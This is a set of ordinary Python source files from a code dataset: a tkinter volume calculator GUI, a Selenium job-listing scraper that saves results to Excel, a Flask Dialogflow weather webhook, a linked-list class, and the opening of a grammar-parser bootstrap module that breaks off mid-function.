self.Label3_3 = tk.Label(self.top)\n self.Label3_3.place(relx=0.716, rely=0.07, height=79, width=307)\n self.Label3_3.configure(activebackground=\"#f9f9f9\")\n self.Label3_3.configure(anchor='w')\n self.Label3_3.configure(background=\"#2e3349\")\n self.Label3_3.configure(compound='left')\n self.Label3_3.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_3.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_3.configure(foreground=\"#ffffff\")\n self.Label3_3.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_3.configure(highlightcolor=\"black\")\n self.Label3_3.configure(text='''Volume:''')\n\n self.Button1.configure(command=self.calcular)\n\n\ndef start_up():\n tela_support.main()\n\n\nif __name__ == '__main__':\n tela_support.main()\n","repo_name":"ubiratantavares/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot","sub_path":"aula4/tela.py","file_name":"tela.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
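The calcular handler in the record above implements the cylinder-volume formula V = pi * r^2 * h with r = diameter / 2. A standalone version is sketched below; note the result is a volume, so cubic metres are the natural unit:

import math

def cylinder_volume(height_m, diameter_m):
    radius = diameter_m / 2
    return math.pi * radius ** 2 * height_m   # m^3

print(round(cylinder_volume(2.0, 1.0), 3))    # 1.571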
+{"seq_id":"9579051034","text":"# from os import system\n\n# system('pip install -r requirements.txt')\n\nimport datetime\nimport requests\nimport openpyxl\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nfrom threading import Thread\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\ndef prepare_soup(link:str) -> BeautifulSoup:\n '''\n argument -- link:str\n return -- parsed HTML:BeautifulSoup if successful\n False:bool if failed\n '''\n html = requests.get(link)\n if html.status_code == 200:\n # open('a.txt','w',encoding='utf-8').write(html.text)\n return BeautifulSoup(html.text, \"html.parser\")\n else:\n return False\n\ndef filters():\n title = input(\"Enter job title to search for: \")\n location = input('Enter job location: ')\n postage = int(input(\"\"\"Posted withtin:\n 1. Last 24 hours\n 2. Last 3 days\n 3. Last 7 days\n 4. Last 14 days\n 0. All\n \"\"\"))\n job_type = int(input(\"\"\"Job Type:\n 1. Permanent\n 2. Contract\n 3. Temporary\n 4. Part Time\n 0. All\n\"\"\"))\n salary = int(input(\"\"\" Salary:\n 1. at least £10,000 \n 2. at least £20,000 \n 3. at least £30,000 \n 4. at least £40,000 \n 5. at least £50,000 \n 6. at least £60,000 \n 7. at least £70,000 \n 8. at least £80,000 \n 9. at least £90,000 \n 10. at least £100,000\n 0. All\n \"\"\"))\n N = int(input('Enter number of jobs to be scraped from each site:'))\n return title, location, postage, job_type, salary, N\n\n\n\n\n\ndef open_browser(driver, url):\n driver.get(url) \n return driver\n\n\n\n\ndef click_on_filter(driver, element):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, element))\n )\n element.click()\n\n\n\n\ndef write_xl(df,filename, sheet):\n with pd.ExcelWriter(filename, engine=\"openpyxl\", mode=\"a\") as writer:\n df.to_excel(writer, sheet_name=sheet, index=False, encoding='utf-8')\n\n\n\n\n# soup = None\n\ndef efc(driver, JOBTITLE, LOCATION): \n\n def get_efc_descr(link):\n soup = prepare_soup(link)\n if not soup:\n return ''\n desc = soup.find_all('div',{'class':'jobContentFrame'})[0]\n summary = desc.text.strip()\n return summary\n\n\n age_dict = {0:'', 1 : \"ONE\", 2 : \"THREE\", 3 : \"SEVEN\", 4 : \"SEVEN\"}\n type_dict = [\"CONTRACT\", \"PERMANENT\",\"TEMPORARY\", \"INTERNSHIPS_AND_GRADUATE_TRAINEE\"]\n type_dict.insert(0, '%7C'.join(type_dict))\n if sal_fltr < 4: sal = 'FIRST'\n elif sal_fltr < 8: sal = 'SECOND'\n else: sal = \"THIRD_TIER|FOURTH_TIER|FIFTH_TIER|SIXTH\"\n url = f'https://www.efinancialcareers.com/search/?q={JOBTITLE}&location={LOCATION}&page=1&pageSize=100&filters.postedDate={age_dict[age_fltr]}&filters.positionType={type_dict[jt_fltr]}&filters.salaryBand={sal}_TIER'\n print('fetching from site:', url)\n if age_fltr == 0: \n url = url.replace('&filters.postedDate=','')\n driver = open_browser(driver, url)\n try:\n\n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, 
\"/html/body/dhi-job-search/dhi-search-page-container/dhi-search-page/div/dhi-search-page-results/div/div[3]/js-search-display/div/div[2]/dhi-search-cards-widget/div/dhi-new-search-card[1]/div\")))\n html = driver.page_source\n # global soup\n soup = BeautifulSoup(html, \"html.parser\")\n for job in soup.findAll('div', 'search-card'):\n if count >= N: \n break\n count += 1\n\n new_link = 'https://www.efinancialcareers.com/' + job.find_all('a',{'class':'card-title-link bold'})[0].attrs['href']\n summary = get_efc_descr(new_link)\n # summary = 'test'\n\n data.append([job.a.text.strip(),\n job.find('div', 'card-salary ng-star-inserted').text.strip(),\n job.find(id = 'searchResultLocation').text.strip(),\n job.find('span', {'data-cy' : 'card-posted-date'}).text.strip(),\n job.find('span', {'data-cy' : 'search-result-employment-type'}).text.strip(),\n summary\n # job.find('div', {'data-cy' : 'card-summary'}).text.strip() + '...'\n ])\n try:\n next_btn = None\n # next_btn = driver.find_element(By.XPATH, \"/html/body/dhi-job-search/dhi-search-page-container/dhi-search-page/div/dhi-search-page-results/div/div[3]/js-search-display/div/div[3]/div[1]/js-search-pagination-container/pagination/ul/li[5]/a\")\n next_btn = driver.find_elements_by_class_name('page-link')\n next_btn[-1].click()\n except NoSuchElementException:\n pass\n except Exception as e:\n # print(e)\n break\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print('An error occured:', e)\n finally:\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, 'efinancialcareers')\n # driver.close()\n print('done')\n\ndef multi_site(driver, JOBTITLE, LOCATION, site = 'cw'):\n url_dict = {\"cw\":'https://www.cwjobs.co.uk',\n \"total\":\"https://www.totaljobs.com\",\n \"jobsite\": \"https://www.jobsite.co.uk/\",\n \"city\": \"https://www.cityjobs.com/\"\n }\n sal_element = f'//*[@id=\"facetListAnnualPayRate\"]/ul/li[{sal_fltr}]/a'\n age_element = f'//*[@id=\"facetListDatePosted\"]/div[2]/ul/li[{age_fltr}]/a'\n jt_element = f'//*[@id=\"facetListJobType\"]/div[2]/ul/li[{jt_fltr}]/a'\n url = url_dict[site]\n print('fetching from site:', url)\n open_browser(driver, url)\n try:\n cookie = driver.find_element_by_class_name(\"privacy-prompt-button.primary-button.accept-button-new\")\n cookie.click()\n except:\n pass\n title_field = driver.find_element_by_id(\"keywords\")\n title_field.send_keys(JOBTITLE)\n loc_field = driver.find_element_by_id(\"location\")\n loc_field.send_keys(LOCATION)\n search_btn = driver.find_element_by_id(\"search-button\")\n search_btn.click()\n try: \n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"col-sm-9.job-results\"))\n )\n if sal_fltr != 0:\n click_on_filter(driver, sal_element)\n if age_fltr != 0:\n click_on_filter(driver, age_element)\n if jt_fltr != 0:\n click_on_filter(driver, jt_element)\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n link_ct = 0\n for job in soup.find_all('div', 'job'):\n link_ct += 1\n if not \"ci-advert-job\" in job['class']:\n if count >= N: \n break\n count += 1\n try:\n links = driver.find_elements_by_class_name('job-title')\n data.append([job.find('h2').text,\n job.find('li', 'salary').text,\n job.find('li', 'location').span.text.replace('\\n', ''),\n job.find('li', 'date-posted').span.text.strip(),\n job.find('li', 
'job-type').span.text])\n except:\n print('Some jobs in this site have incomplete information to scrape. Skipping those...')\n # job.find('p', 'job-intro').text])\n try:\n link = links[count].find_element_by_tag_name('a')\n main_window = driver.current_window_handle\n action = ActionChains(driver)\n \n action.key_down(Keys.CONTROL).key_down(Keys.SHIFT).click(link).key_up(Keys.CONTROL).key_up(Keys.SHIFT).perform()\n\n driver.switch_to.window(driver.window_handles[-1])\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"job-description\")))\n desc = driver.page_source\n desc = BeautifulSoup(desc, \"html.parser\")\n p = desc.find('div', \"job-description\").text.strip()\n\n data[-1].append(p)\n # driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 'w')\n driver.close()\n driver.switch_to.window(main_window)\n except Exception as e:\n pass\n # print(e)\n try:\n link_ct = 0\n next_btn = None\n next_btn = driver.find_element_by_class_name('btn.btn-default.next')\n next_btn.click()\n except NoSuchElementException:\n pass\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print(\"An error occured: \",e)\n\n finally:\n print('done')\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, site)\n # driver.close()\n\n\ndef indeed(driver, JOBTITLE, LOCATION):\n\n def indeed_job_description(link):\n soup = prepare_soup(link)\n if not soup:\n return ''\n summary = soup.find(id='jobDescriptionText').text.strip()\n return summary\n \n base_url = 'https://uk.indeed.com'\n\n type_list = ['','permanent','contract','temporary', 'parttime']\n age = {1:1,2:3,3:7,4:14,0:''}\n sal = sal_fltr*10000 if sal_fltr > 0 else ''\n url = f'https://uk.indeed.com/jobs?q={JOBTITLE}+£{sal}&l={LOCATION}&jt={type_list[jt_fltr]}&fromage={age[age_fltr]}'\n if jt_fltr == 0: \n url = url.replace('&jt=', '')\n if age_fltr == 0: \n url = url.replace('&fromage=', '')\n if sal_fltr == 0: \n url = url.replace('+£','')\n print('fetching from site:', url)\n try:\n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n open_browser(driver, url)\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"resultsCol\"))\n )\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n links = driver.find_elements_by_class_name('title')\n link_ct = 0\n for job in soup.findAll('div', 'jobsearch-SerpJobCard'):\n link_ct += 1\n if count >= N: \n break\n count += 1\n\n try:\n salary = job.find_all('span',{'class':'salaryText'})[0].text.strip()\n except:\n salary = '-NA-'\n # try:\n # driver.find_element_by\n # except:\n # intro = '-NA-'\n job_title = job.h2.a.text.strip()\n _location = job.find('span', 'location').text.strip()\n _date = job.find('span', 'date').text.strip()\n _type = type_list[jt_fltr]\n\n # click to new tab\n new_link = base_url + job.h2.a.attrs['href']\n _intro = indeed_job_description(new_link)\n\n data.append([job_title,\n salary,\n _location,\n _date,\n _type,\n _intro\n ])\n #click on job card\n # links[count].find_element_by_tag_name('a').click()\n driver.back()\n try:\n link_ct = 0\n next_btn = None\n next_btn = driver.find_element(By.XPATH, '//*[@id=\"resultsCol\"]/nav/div/ul')\n pos = url.find('&start=')\n if pos != -1:\n url = url[:pos]\n url = url + '&start='+str((count // 10) * 10)\n except NoSuchElementException:\n pass\n except TimeoutException:\n print('No search result found')\n 
except Exception as e:\n print('An error occured:', e)\n finally:\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, 'indeed')\n # driver.close()\n print('done')\n\ndef format_filename(name):\n for i in set(name):\n if not i.isalnum():\n name = name.replace(i, '_')\n return name\n\n\nif __name__ == '__main__':\n timestamp = str(datetime.datetime.now())\n filename = format_filename(timestamp) + '.xlsx'\n writer = openpyxl.Workbook()\n writer.save(filename)\n title, location, age_fltr, jt_fltr, sal_fltr, N = filters()\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument(\"--disable-notifications\")\n chrome_options.add_argument(\"--disable-popup-blocking\")\n driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)\n # driver = webdriver.Chrome(ChromeDriverManager().install())\n multi_site(driver, title, location, site=\"cw\")\n multi_site(driver, title, location, site=\"total\")\n multi_site(driver, title, location, site=\"jobsite\")\n multi_site(driver, title, location, site=\"city\")\n efc(driver, title, location)\n indeed(driver, title, location)\n # Thread(target = efc(\"web-dev\", \"london\")).start()\n # Thread(target = multi_site(\"web-dev\", \"london\")).start()\n driver.quit()\n","repo_name":"VishnuNarayananSR/Freelancing","sub_path":"7-Jobsite-scraping/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":14244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
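For reference, a worked example of the filename sanitiser defined near the end of the script above (the assertion is illustrative, not part of the original):

# format_filename replaces every non-alphanumeric character with '_',
# which is how the timestamped workbook name is produced:
assert format_filename("2024-01-02 03:04:05.678900") == "2024_01_02_03_04_05_678900"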
+{"seq_id":"31377662408","text":"from flask import Flask, request, make_response\nimport json\nfrom flask_cors import CORS, cross_origin\nfrom weather import city_weather\n\napp = Flask(__name__)\n\n@app.route('/webhook', methods=['POST'])\n@cross_origin()\ndef weather():\n res = request.json\n result = res.get('queryResult')\n param = result.get('parameters')\n city = param.get('geo-city')\n w = city_weather()\n\n resp = w.weather_in(city)\n resp = json.dumps(resp)\n r = make_response(resp)\n r.headers['content-type'] = 'application/json'\n return r\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"biswajitburagohain/dialogflow_weather_chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"74453223529","text":"class Node:\r\n def __init__(self, data): # Instance attributes\r\n self.data = data # attribute called data\r\n self.next = None \r\n \r\n # Instance method ~ dunder method\r\n def __repr__(self):\r\n return self.data\r\n \r\nclass LinkedList:\r\n def __init__(self, nodes=None):\r\n self.head = None \r\n if nodes is not None:\r\n node = Node(data=nodes.pop(0))\r\n self.head = node\r\n for elem in nodes:\r\n node.next = Node(data=elem)\r\n node = node.next\r\n \r\n # Instance method ~ dunder method \r\n def __repr__(self): \r\n node = self.head\r\n nodes = []\r\n while node is not None:\r\n nodes.append(node.data)\r\n node = node.next\r\n nodes.append(\"None\")\r\n return \" -> \".join(nodes)\r\n\r\n \r\n\r\n ","repo_name":"davestroud/Algorithm_Fundamentals","sub_path":"Facebook/Linked_Lists/Linked_List.py","file_name":"Linked_List.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
+{"seq_id":"9987075613","text":"# -*- coding: utf-8 -*-\n#! \\file ./doit/text/pgen/readers/glap/bootstrap/__init__.py\n#! \\author Jiří Kučera, \n#! \\stamp 2016-12-19 02:04:45 (UTC+01:00, DST+00:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nGLAP bootstrap.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nfrom doit.support.utils import \\\n Functor\n\nfrom doit.support.cmd.runtime import \\\n Location\n\nfrom doit.support.cmd.commands import \\\n Const, \\\n MacroNode, MacroNodeSequence, MacroNodeAtom, MacroNodeParam, \\\n Expand, \\\n SetLocal, GetLocal, \\\n DefMacro, Define, DefModule, \\\n Add, Sub, Mul, Div, Mod, Neg, \\\n BitAnd, BitOr, BitXor, ShiftL, ShiftR, Inv, \\\n Lt, Gt, Le, Ge, Eq, Ne, Is, \\\n And, Or, Not, \\\n NewPair, NewList, NewHashMap, \\\n Concat, Join, Merge, \\\n Contains, \\\n GetItem, \\\n Lambda, \\\n Block, If, Foreach, While, DoWhile, Break, Continue, \\\n Call, Return, \\\n TryCatchFinally, Throw, Rethrow, \\\n SetItem, \\\n SetMember, GetMember\n\nfrom doit.text.pgen.errors import \\\n ParsingError\n\nfrom doit.text.pgen.readers.reader import \\\n Reader\n\nfrom doit.text.pgen.models.action import \\\n AddExpr as AAddExpr, SubExpr as ASubExpr, MulExpr as AMulExpr, \\\n DivExpr as ADivExpr, ModExpr as AModExpr, \\\n BitAndExpr as ABitAndExpr, BitOrExpr as ABitOrExpr, \\\n BitXorExpr as ABitXorExpr, \\\n ShiftLeftExpr as AShiftLeftExpr, ShiftRightExpr as AShiftRightExpr, \\\n NegExpr as ANegExpr, InvExpr as AInvExpr, \\\n EqExpr as AEqExpr, NotEqExpr as ANotEqExpr, LtExpr as ALtExpr, \\\n GtExpr as AGtExpr, LeExpr as ALeExpr, GeExpr as AGeExpr, \\\n LogAndExpr as ALogAndExpr, LogOrExpr as ALogOrExpr, NotExpr as ANotExpr, \\\n CallExpr as ACallExpr, \\\n IndexExpr as AIndexExpr, AccessExpr as AAccessExpr, \\\n Id as AId, IntLiteral as AIntLiteral, FloatLiteral as AFloatLiteral, \\\n StringLiteral as AStringLiteral, \\\n Block as ABlock, \\\n Assign as AAssign, InplaceAdd as AInplaceAdd, InplaceSub as AInplaceSub, \\\n InplaceMul as AInplaceMul, InplaceDiv as AInplaceDiv, \\\n InplaceMod as AInplaceMod, InplaceBitAnd as AInplaceBitAnd, \\\n InplaceBitOr as AInplaceBitOr, InplaceBitXor as AInplaceBitXor, \\\n InplaceShiftLeft as AInplaceShiftLeft, \\\n InplaceShiftRight as AInplaceShiftRight, \\\n If as AIf, Case as ACase, For as AFor, While as AWhile, \\\n DoWhile as ADoWhile, Continue as AContinue, 
Break as ABreak, \\\n Return as AReturn, ReturnWithValue as AReturnWithValue\n\nfrom doit.text.pgen.models.cfgram import \\\n Epsilon, Sym, Literal, Var, Range, Action, \\\n SetMinus\n\nfrom doit.text.pgen.readers.glap.bootstrap.pp.commands import \\\n DefRule, DefGrammar\n\nie_ = lambda msg: \"%s (%s; %s)\" % (\n msg,\n \"internal error\",\n \"if you see this text, the command compiler is probably buggy\"\n)\nmn_ = lambda ncls, ctx, loc, *args: (\n ncls(*args).set_location(*make_location(ctx, loc))\n)\n\ndef make_location(context, loc = -1):\n \"\"\"\n \"\"\"\n\n stream = context.stream\n if loc < 0:\n loc = stream.pos\n s = stream.data[0 : loc]\n lineno = s.count('\\n') + 1\n if lineno > 1:\n s = s.split('\\n')[-1]\n colno = len(s) + 1\n return stream.name, lineno, colno\n#-def\n\nclass SetLocation(Functor):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, file, lineno, colno):\n \"\"\"\n \"\"\"\n\n Functor.__init__(self, file, lineno, colno)\n #-def\n\n def __call__(self, node):\n \"\"\"\n \"\"\"\n\n node.set_location(*self.args)\n #-def\n#-class\n\nclass GlapLexError(ParsingError):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, context, detail, loc = -1):\n \"\"\"\n \"\"\"\n\n name, lineno, colno = make_location(context, loc)\n ParsingError.__init__(self, \"In <%s> at [%d:%d]: %s\" % (\n name, lineno, colno, detail\n ))\n #-def\n#-class\n\nclass GlapSyntaxError(ParsingError):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, context, detail, loc = -1):\n \"\"\"\n \"\"\"\n\n p = context.lexer.token.position() if context.lexer.token else -1\n name, lineno, colno = make_location(context, p if loc < 0 else loc)\n ParsingError.__init__(self, \"In <%s> at [%d:%d]: %s\" % (\n name, lineno, colno, detail\n ))\n #-def\n#-class\n\nclass GlapContext(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'stream', 'lexer', 'parser', 'actions', 'env', 'processor' ]\n\n def __init__(self):\n \"\"\"\n \"\"\"\n\n self.stream = None\n self.lexer = None\n self.parser = None\n self.actions = None\n self.env = None\n self.processor = None\n #-def\n#-class\n\nclass GlapStream(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'context', 'name', 'data', 'pos', 'size' ]\n\n def __init__(self, context, name, s):\n \"\"\"\n \"\"\"\n\n context.stream = self\n self.context = context\n self.name = name\n self.data = s\n self.pos = 0\n self.size = len(s)\n #-def\n\n def peek(self, n):\n \"\"\"\n \"\"\"\n\n return self.data[self.pos : self.pos + n]\n #-def\n\n def next(self, n = 1):\n \"\"\"\n \"\"\"\n\n self.pos += n\n #-def\n\n def match(self, p):\n \"\"\"\n \"\"\"\n\n if self.peek(len(p)) != p:\n raise GlapLexError(self.context, \"Expected %r\" % p)\n self.pos += len(p)\n return p\n #-def\n\n def matchset(self, set):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[self.pos - 1]\n raise GlapLexError(self.context,\n \"Expected one of [%s]\" % repr(set)[1:-1]\n )\n #-def\n\n def matchif(self, f, fname):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[self.pos - 1]\n raise GlapLexError(self.context, \"Expected %s\" % fname)\n #-def\n\n def matchmany(self, set):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[p : self.pos]\n #-def\n\n def matchmanyif(self, f):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[p : self.pos]\n 
#-def\n\n def matchplus(self, set):\n \"\"\"\n \"\"\"\n\n m = self.matchset(set)\n return \"%s%s\" % (m, self.matchmany(set))\n #-def\n\n def matchplusif(self, f, fname):\n \"\"\"\n \"\"\"\n\n m = self.matchif(f, fname)\n return \"%s%s\" % (m, self.matchmanyif(f))\n #-def\n\n def matchopt(self, set, default):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[self.pos - 1]\n return default\n #-def\n\n def matchoptif(self, f, default):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[self.pos - 1]\n return default\n #-def\n\n def matchn(self, set, n):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while n > 0 and self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n n -= 1\n if n > 0:\n raise GlapLexError(self.context,\n \"Expected one of [%s]\" % repr(set)[1:-1]\n )\n return self.data[p : self.pos]\n #-def\n\n def matchnif(self, f, n, fname):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while n > 0 and self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n n -= 1\n if n > 0:\n raise GlapLexError(self.context, \"Expected %s\" % fname)\n return self.data[p : self.pos]\n #-def\n#-class\n\nclass GlapCompileCmdHelper(object):\n \"\"\"\n \"\"\"\n UNSPECIFIED = -1\n NULLARY_EXPR = 0\n UNARY_EXPR = 1\n BINARY_EXPR = 2\n INDEX_EXPR = 3\n ACCESS_EXPR = 4\n ASSIGN_EXPR = 5\n NARY_EXPR = 6\n CALL_EXPR = 7\n LAMBDA_EXPR = 8\n EXPAND = 9\n VARIABLE = 10\n STATEMENT = 11\n DEFMACRO_STATEMENT = 12\n DEFINE_STATEMENT = 13\n MACRO_NODE_NULLARY = 14\n MACRO_NODE_UNARY = 15\n MACRO_NODE_BINARY = 16\n MACRO_NODE_INDEX = 17\n MACRO_NODE_ACCESS = 18\n MACRO_NODE_ASSIGN = 19\n MACRO_NODE_NARY = 20\n MACRO_NODE_CALL = 21\n MACRO_NODE_LAMBDA = 22\n MACRO_EXPAND = 23\n MACRO_VARIABLE = 24\n MACRO_PARAM = 25\n MACRO_STATEMENT = 26\n __slots__ = [\n 'kind', 'node', 'code', 'vars', 'value_holder', 'context', 'location',\n 'errmsg'\n ]\n\n def __init__(self, context, location, errmsg):\n \"\"\"\n \"\"\"\n\n self.kind = self.UNSPECIFIED\n self.node = None\n self.code = []\n self.vars = []\n self.value_holder = None\n self.context = context\n self.location = location\n self.errmsg = errmsg\n #-def\n\n def remove_duplicated_vars(self):\n \"\"\"\n \"\"\"\n\n vars = []\n for v in self.vars:\n if v not in vars:\n vars.append(v)\n self.vars = vars\n #-def\n\n def value_expr(self):\n \"\"\"\n \"\"\"\n\n if self.value_holder is None:\n raise GlapSyntaxError(self.context, self.errmsg, self.location)\n return self.value_holder\n #-def\n\n @classmethod\n def checknode(cls, context, loc, node):\n \"\"\"\n \"\"\"\n\n errmsg = \"\"\n inmacro = context.actions.inmacro\n if node.kind >= cls.MACRO_NODE_NULLARY and not inmacro:\n errmsg = \"Macro node was detected outside macro definition\"\n if node.kind < cls.MACRO_NODE_NULLARY and inmacro:\n errmsg = \"Non-macro node was detected inside macro definition\"\n if errmsg != \"\":\n raise GlapSyntaxError(context, ie_(errmsg), loc)\n #-def\n\n @classmethod\n def make_unary(cls, context, loc, expr, unop):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, expr)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_UNARY\n o.node = MacroNode(unop, expr.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.UNARY_EXPR\n o.node = unop(expr.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(expr.code)\n o.vars.extend(expr.vars)\n 
o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_binary(cls, context, loc, lhs, rhs, binop):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, lhs)\n cls.checknode(context, loc, rhs)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_BINARY\n o.node = MacroNode(binop, lhs.value_expr(), rhs.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.BINARY_EXPR\n o.node = binop(lhs.value_expr(), rhs.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(lhs.code)\n o.code.extend(rhs.code)\n o.vars.extend(lhs.vars)\n o.vars.extend(rhs.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_index(cls, context, loc, expr, idx):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, expr)\n cls.checknode(context, loc, idx)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_INDEX\n o.node = MacroNode(GetItem, expr.value_expr(), idx.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.INDEX_EXPR\n o.node = GetItem(expr.value_expr(), idx.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(expr.code)\n o.code.extend(idx.code)\n o.vars.extend(expr.vars)\n o.vars.extend(idx.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_access(cls, context, loc, module, member):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, module)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_ACCESS\n o.node = MacroNode(\n GetMember, module.value_expr(), MacroNodeAtom(member.value())\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.ACCESS_EXPR\n o.node = GetMember(module.value_expr(), member.value())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(module.code)\n o.vars.extend(module.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_assign(cls, context, loc, lhs, rhs, inplaceop = None):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, lhs)\n cls.checknode(context, loc, rhs)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_ASSIGN\n else:\n o.kind = cls.ASSIGN_EXPR\n if lhs.kind in (cls.VARIABLE, cls.MACRO_VARIABLE):\n if inplaceop:\n if inmacro:\n a = MacroNode(GetLocal, MacroNodeAtom(lhs.node.value()))\n a.deferred.append(SetLocation(*make_location(\n context, lhs.node.position()\n )))\n ve = MacroNode(inplaceop, a, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetLocal, MacroNodeAtom(lhs.node.value()), ve\n )\n else:\n a = GetLocal(lhs.node.value())\n a.set_location(*make_location(\n context, lhs.node.position()\n ))\n ve = inplaceop(a, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = 